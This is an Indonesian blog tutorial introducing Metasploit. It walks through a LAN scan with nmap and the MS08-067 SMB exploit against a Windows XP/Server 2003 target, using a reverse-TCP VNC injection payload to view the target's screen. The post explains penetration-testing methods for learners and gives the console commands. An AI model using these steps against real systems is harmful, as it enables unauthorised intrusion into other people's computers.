Rabu, 18 September 2013

Pengenalan Metasploit dan Tutorial Penetrasi Windows XP/Server 2003

Karena postingan saya tentang hacking sedikit, saya akan mencoba menambahnya. Kali ini kita akan mencoba membahas Metasploit. Bagi yang merasa sudah sering menggunakannya, silakan membaca postingan ini juga untuk cross check pengetahuan anda (^_^). Tutorial tentang Metasploit sangat banyak beredar, tapi saya akan coba membahasnya dari dasar sekali.



Metasploit adalah sebuah framework penetrasi jaringan komputer yang free dan open source, diciptakan oleh H.D. Moore pada tahun 2003 dan kini diakuisisi oleh Rapid7. Versi stabilnya sekarang ditulis menggunakan bahasa Ruby. Metasploit memiliki exploit database terbesar di dunia dan termasuk proyek pemrograman Ruby yang paling kompleks.



Istilah-istilah yang penting untuk kita pahami dalam pembelajaran awal Metasploit adalah :

             Vulnerability : kelemahan pada keamanan suatu sistem atau jaringan komputer yang memungkinkan penyusup melakukan pengambilalihan atau pencurian data.

             Exploit : adalah suatu kode yang membuat penyerang bisa memanfaatkan Vulnerability tadi untuk melakukan penyusupan.

              Payload : adalah kode program yang dimasukkan setelah exploit menemukan celah keamanan. Payload inilah yang sebenarnya bekerja dalam proses penetrasi jaringan.


Bagi pengguna Kali Linux atau Backtrack, Metasploit sudah terinstalasi dari awal. Bagi pengguna distro Linux lainnya dan Windows bisa mengunduhnya di http://www.metasploit.com/ dan menginstalasinya sesuai cara yang ada. Saya tidak akan membahas instalasi karena di ­link tersebut sudah dijelaskan dan tutorial instalasi banyak beredar. Saya menggunakan sistem operasi Windows 8 dan kira-kira inilah tampilan awal Metasploit saya :



                                                          Tampilan Awal Metasploit Console


Pertama, kita harus melakukan pengumpulan informasi sebanyak-banyaknya mengenai target. Tahapan ini disebut Footprinting dan Scanning. Banyak cara untuk melakukan ini, termasuk Social Engineering, tapi saya akan membahas yang berkaitan dengan Metasploit saja, yaitu cara NMap. Saya akan melakukan peretasan pada komputer target yang berada pada 1 LAN yang sama dengan saya. Prinsip ini sebenarnya tidak terlalu berbeda dengan peretasan pada komputer yang jauh (remote target) – hanya saja sedikit berbeda pada bagian Footprinting dan Scanning saja. Pada akhirnya, metode yang digunakan tetap sama. Untuk penyerangan remote target, koneksi internet yang stabil sangat diutamakan.



Untuk memeriksa apakah ada komputer aktif pada LAN yang sama, kita bisa menggunakan Advanced IP Scanner 1.5. Jika anda memiliki network scanner lain, bisa digunakan.

Scanning Network Lokal
           Dari gambar yang terlihat, selain saya dengan IP Address 192.168.137.1/24, terdapat 2 komputer lain yang sedang terhubung dengan LAN saya, yaitu 192.168.137.2/24 dan 192.168.137.3/24. Sekarang saya menetapkan bahwa target adalah 192.168.137.2/24. Lakukan port scanning dan OS fingerprinting menggunakan perintah nmap . Secara default, NMap melakukan port scanning dengan memanfaatkan TCP 3-Way Handshake. Tapi anda juga bisa melakukan berbagai tipe scanning seperti SYN Scan (-sS) yang lebih susah dideteksi firewall biasa, UDP Scan (-sU) untuk memeriksa port UDP target dan ACK Scan (-sA) untuk memeriksa port menggunakan paket TCP ACK. Masing-masing memiliki keunggulan tersendiri. Saya akan mencontohkan NMap menggunakan TCP Scan, ditambah OS fingerprinting sekaligus (-O).



Port Scanning dan OS Fingerprinting Menggunakan NMap


Nah, kini kita mengetahui bahwa port 135, 139 dan 445 terbuka dan OS yang digunakan kemungkinan Windows XP atau Server 2003. Kini kita harus memilih serangan yang sesuai dengan service port yang terbuka. Saya akan memilih port 445.



Kita akan memanfaatkan kelemahan netapi pada Server Message Block (SMB). Ketikkan :

 use exploit/windows/smb/ms08_067_netapi

show options




Disana bisa kita lihat opsi yang harus dimasukkan untuk menjalankan exploit. Mari kita masukkan RHOST dengan IP Address target kita :

 set RHOST 192.168.137.2


Berikutnya kita ingin mendapatkan display dari komputer target. Biasanya hacker pemula sangat suka dengan visualisasi (meskipun saya pribadi lebih suka command-line). Kita harus menginjeksikan payload VNC ke komputer target. Saya akan menggunakan injeksi VNC dengan reverse TCP.


set PAYLOAD windows/vncinject/reverse_tcp

show options




Isi nilai LHOST dengan IP Address komputer kita :

set LHOST 192.168.137.1



Untuk memulai ketikkan exploit dan tekan ENTER. Maka kita berhasil menjebol pertahanan target dan mendapatkan displaynya.






Tampilan Display Komputer Target Menggunakan VNC Injection 



               Penguasaan Metasploit harus melalui tahapan yang sangat pelan. Postingan ini hanyalah 1 contoh dari ribuan cara melakukan penetrasi menggunakan Metasploit. Kompleksitas modul ini sangat menarik untuk dipelajari dan untuk mempelajarinya, kita harus mengerti karakteristik tiap sistem operasi dan service yang ada dalam suatu jaringan komputer. Ingat, Metasploit bukan sebuah senapan mesin dengan banyak peluru yang bisa dihamburkan membabi-buta, melainkan sebuah sniper rifle yang hanya digunakan ketika kita tahu pasti apa saja yang dilakukan target.



Sekian dulu penjelasan dari saya, semoga bermanfaat.

Tidak ada komentar:

Posting Komentar